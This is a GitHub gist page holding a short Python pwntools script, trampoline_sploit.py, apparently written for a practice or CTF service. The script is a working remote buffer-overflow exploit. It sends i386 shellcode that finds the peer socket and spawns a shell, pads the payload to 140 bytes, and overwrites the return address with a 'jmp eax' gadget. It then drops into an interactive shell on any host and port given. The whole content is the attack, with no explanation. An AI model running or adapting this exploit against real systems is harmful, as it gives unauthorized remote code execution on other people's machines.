Skip to content

Instantly share code, notes, and snippets.

@RobertLarsen
Created December 1, 2014 07:48
Show Gist options
  • Save RobertLarsen/b1a6a2facf075b74196b to your computer and use it in GitHub Desktop.
Save RobertLarsen/b1a6a2facf075b74196b to your computer and use it in GitHub Desktop.
trampoline_sploit.py
#!/usr/bin/python
from pwn import *
import sys
context(os='linux', arch='i386')
jmp_eax=0x08048bf7
host = 'localhost'
port = 9988
if len(sys.argv) > 1:
host = sys.argv[1]
if len(sys.argv) > 2:
port = int(sys.argv[2])
sock = remote(host, port)
sock.recvline()
sock.recvline()
shellcode = asm(shellcraft.i386.linux.findpeersh())
sock.send(flat(shellcode, 'A' * (140 - len(shellcode)), jmp_eax))
sock.interactive()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment